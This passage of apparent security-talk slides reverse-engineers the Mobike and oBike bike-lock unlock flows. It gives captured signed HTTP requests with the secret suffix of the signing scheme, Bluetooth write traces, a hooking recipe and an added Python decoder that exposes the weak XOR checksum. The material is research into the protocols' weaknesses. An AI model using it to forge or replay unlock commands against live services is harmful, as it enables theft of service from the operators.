        Key Index / ??? / Date Time:     b4 00 00 02 79 40 48 00 6b a4 b7 5a
      Message 2
        AES Key (Truncated) / BCC:       8b e1 be 17 d4 1e 8f df f1 ae 1c 82 ff
      +[BluetoothSendMessage setValueForUnlock:1521984619.298000 Index:0xb4 Phone:0xa383430343937327 Key:8be1be17d41e8fdff1ae1c82e4500fec]
      BCC Calculation:
        for i in bytearr { x ^= i }
        return x
        bytearr = Command … AES Key
  • 41. Mobike unlock flow
      01 http://www.mobike.com/download/app.html?b=AXXXXXXX
      02 App Checks Lock Status. Uploads Coordinates.
      03 Server Responds with Lock Status
      04 Server Responds with Unlock Key
      05 Unlock Bike Lock
  • 42. HTTP Message Integrity Check
      POST /api/v2/rentmgr/unlockBike.do?sign=b9441790c2e3c42a57b439b51995f546 HTTP/1.1
      Host: app.mobike.com
      time: 1530100847000
      mobileNo: +6512345678
      accesstoken: XXXXXXXXXXXXXXXX
      platform: 0
      Content-Type: application/x-www-form-urlencoded
      Connection: close
      Content-Length: 445

      accesstoken=XXXXXXXXXXXXXXXX&bikecode=A0000XXXXX&biketype=0&btEnabled=1&channel=1&client_id=ios&epdata=Es7dCTkXiZ1IV3H6z%2BS9R%2BYzRjFby0T4ADUNKh0aXm6wfZzfJtQEQ5IC%2By5lZYGKFVy8I9vP6wwvkKCEqxNSMMCM3WespduyU8Svj7qyadFV4pN/nbC1behZa7ew3V0G8ofy6udhTkjbWLcjWeWvioJwrELB24aALccUKxCoMds%3D&latitude=1.3XXX&longitude=103.8XXX&mobileNo=+6512345678&time=1530100847000&timestamp=1530100847.123456&userid=XXXXXXXXX
  • 43. HTTP Message Encryption
      30714 ms | +[RSA encryptString:XXXXXXXXXXuseridXXXXXXX#1530031691.737942 publicKey:MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCi/VezJp6KaJNXZCHpQ4YmKxlWrcrddow5pHDX3vHeiUqdOoJZJoBpUvFuFdlWEqP7itWNcPnuYAqRwXkh6xWD1oM4MrK4eH8/AzdGIgrcgq+pbB3DymgEujkHBhrxXqFiUS2OjfebKwU0xJTPQM/KcxjqGDZxzswOxFJDxyKcwIDAQAB]
      enter mbk_lowercaseMd5 -> accesstoken=XXXXXXXXXX&bikecode=A0000XXXXX&biketype=0&btEnabled=1&channel=1&client_id=ios&epdata=Es7dCTkXiZ1IV3H6z+S9R+YzRjFby0T4ADUNKh0aXm6wfZzfJtQEQ5IC+y5lZYGKFVy8I9vP6wwvkKCEqxNSMMCM3WespduyU8Svj7qyadFV4pN/nbC1behZa7ew3V0G8ofy6udhTkjbWLcjWeWvioJwrELB24aALccUKxCoMds=&latitude=1.381585998461937&longitude=103.8330852148159&mobileNo=+65XXXXXXXX&time=1530031691000&timestamp=1530031691.737942&userid=XXXXXXXXX@iossecret
      leave mbk_lowercaseMd5 -> b9441790c2e3c42a57b439b51995f546
  • 44. 01 http://www.o.bike/download/app.html?m=065002064
      02 App Checks Lock Status. Uploads Coordinates.
      POST /api/v2/rentmgr/unlockBike.do?sign=9623f419340536f95c314d81c4c2b548 HTTP/1.1

      bikecode=A0000XXXXX&biketype=0&btEnabled=1&channel=1&client_id=ios&epdata=ML1G%2BNjHnhzQPMoRZwtBx5k3c0yOBpBFZKePvb3WsR0%2BWBvtT7saxcwIwbI6JAkG27HGjWKMGjeCwUyvw1zOgOA17Lybmbv30ltfBwUkeFmpgklpG2YMEgFEEdCjYxhskfMtoLKWCz3WFBriiZ5S6yHnH5aT1yKe/YB7mMo1f0U%3D&latitude=1.3XXX&longitude=103.8XXXX&timestamp=1530096030.920647&userid=XXXXX
  • 45. 03 Server Responds with Lock Status
      Faulty
      HTTP/1.1 200
      Content-Type: application/json;charset=UTF-8
      Connection: close

      { "bikeHardwareType": 2, "bikeId": "AXXXXXXX", ... "message": "Our apologies, this bike needs maintenance, please use another one", ... }

      04 Server Responds with Unlock Key
      Good
      HTTP/1.1 200
      Content-Type: application/json;charset=UTF-8
      Connection: close

      { "bikeHardwareType": 2, "bikeId": "AXXXXXXX", ... "object": { "authkey": "", "data": "001BB441CB88B4034565E1C7BE448CD4B3D9F5CAA8452A23235201", "orderid": "MBKA0000XXXXXXXX", ...
  • 46. 05 Unlock Bike Lock
      32484 ms -[MBKUnlockBikeData setData:001BB441CB88B4034565E1C7BE448CD4B3D9F5CAA8452A23235201]
      35446 ms -[MBKPeripheral peripheral:<CBPeripheral: 0x1744ee380, identifier = 2B7D32FB-8B34-4C58-BB57-A37976F63FC3, name = mobike, state = connected> didDiscoverCharacteristicsForService:<CBService: 0x172679c80, isPrimary = YES, UUID = A000FAA0-0047-005A-0052-6D6F62696B65> error:0x0]
      35449 ms | -[CBPeripheral setNotifyValue:0x1 forCharacteristic:<CBCharacteristic: 0x174aa45c0, UUID = A000FEE1-0047-005A-0052-6D6F62696B65, properties = 0x10, value = <31>, notifying = NO>]
      35452 ms | -[CBPeripheral setNotifyValue:0x1 forCharacteristic:<CBCharacteristic: 0x174aa46e0, UUID = A000FEE0-0047-005A-0052-6D6F62696B65, properties = 0x8, value = <33324634 46454444 37363546 38453530 46324232>, notifying = NO>]
  • 47. 05 Unlock Bike Lock
      35591 ms | -[MBKPeripheral writeString:30001BB441CB88B40345]
      35592 ms | | -[CBPeripheral writeValue:0x17525e1b0 forCharacteristic:0x174aa46e0 type:0x0]
      35592 ms | | writeValue -> _NSInlineData
      35592 ms | | forCharacteristic -> CBCharacteristic
  • 48. 05 Unlock Bike Lock
      35666 ms | -[MBKPeripheral writeString:3165E1C7BE448CD4B3D9]
      35667 ms | | -[CBPeripheral writeValue:0x17145c410 forCharacteristic:0x174aa46e0 type:0x0]
      35667 ms | | writeValue -> _NSInlineData
      35667 ms | | forCharacteristic -> CBCharacteristic
  • 49. 05 Unlock Bike Lock
      35739 ms | -[MBKPeripheral writeString:32F5CAA8452A23235201]
      35741 ms | | -[CBPeripheral writeValue:0x17125e720 forCharacteristic:0x174aa46e0 type:0x0]
      35741 ms | | writeValue -> _NSInlineData
      35741 ms | | forCharacteristic -> CBCharacteristic
  • 50. Unlock Algorithm
      32484 ms -[MBKUnlockBikeData setData:001BB441CB88B4034565E1C7BE448CD4B3D9F5CAA8452A23235201]
      Message 1: Index ? = 30, Message = 001BB441CB88B40345
      Message 2: Index ? = 31, Message = 65E1C7BE448CD4B3D9
      Message 3: Index ? = 32, Message = F5CAA8452A23235201
  • 53. Repeatable Process
      1. Enumerate Services and Characteristics
      2. Capture Characteristics Settings
         -m "*[CBPeripheral setNotifyValue*]"
      3. Capture BLE Reads & BLE Writes
         -m "*[CBPeripheral readValue*]"
         -m "*[CBPeripheral writeValue*]"
  • 55. Q&A
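
The oBike unlock frame from slide 36, decoded and cross-checked against the server response on slide 34. This is an added example, not code from the original deck: the field boundaries are inferred from the slide's byte groups and the trace's GetBcc size of 0x19, and the function names are hypothetical.

```python
import struct
from functools import reduce

# Bytes copied from slide 36: the two BLE writes that carry the unlock command.
WRITE_1 = bytes.fromhex("67741882" "b4" "00000279404800" "6ba4b75a")
WRITE_2 = bytes.fromhex("8be1be17d41e8fdff1ae1c82" "ff")
# Values returned by the server on slide 34.
SERVER_KEYS = "8be1be17d41e8fdff1ae1c82e4500fec"
SERVER_ENCRYPTION_KEY = 180
SERVER_TIME_MS = 1521984619298


def bcc(data: bytes) -> int:
    """XOR of every byte, as in the slide's 'BCC Calculation'."""
    return reduce(lambda acc, b: acc ^ b, data, 0)


def decode_unlock_frame(write_1: bytes, write_2: bytes) -> dict:
    """Split the reassembled frame into the fields labelled on slide 36.

    Assumption: offsets follow the slide's byte groups; the BCC covers the
    25 bytes from the command byte through the truncated key (GetBcc size 0x19).
    """
    frame = write_1 + write_2
    if len(frame) != 29:
        raise ValueError(f"expected 29 bytes, got {len(frame)}")
    covered = frame[3:28]
    return {
        "prefix": frame[0:2].hex(),        # '???' on the slide
        "length": frame[2],                # 'Message Length'
        "command": frame[3],
        "key_index": frame[4],
        "unknown": frame[5:12].hex(),      # '???' on the slide
        "timestamp": struct.unpack("<I", frame[12:16])[0],  # little-endian
        "key": frame[16:28].hex(),         # 'AES Key (Truncated)'
        "bcc": frame[28],
        "bcc_ok": bcc(covered) == frame[28],
    }


def matches_server_response(fields: dict) -> bool:
    """True when every decoded value is one the server handed to the app."""
    return (fields["key_index"] == SERVER_ENCRYPTION_KEY
            and fields["timestamp"] == SERVER_TIME_MS // 1000
            and SERVER_KEYS.startswith(fields["key"]))


def bcc_ignores_byte_order(frame: bytes) -> bool:
    """XOR is commutative, so a reordered payload keeps the same BCC.

    The BCC therefore catches transmission errors only; it is not a keyed
    integrity check on the frame.
    """
    covered = frame[3:28]
    return bcc(bytes(reversed(covered))) == bcc(covered)


if __name__ == "__main__":
    decoded = decode_unlock_frame(WRITE_1, WRITE_2)
    for name, value in decoded.items():
        print(f"{name:10} {value}")
    print("matches server response:", matches_server_response(decoded))
    print("BCC ignores byte order: ", bcc_ignores_byte_order(WRITE_1 + WRITE_2))
```

The decoded timestamp equals the `ToHex:0x5ab7a46b` value in the slide 35 trace, and the key field is the first 12 bytes of the server's `keys` value.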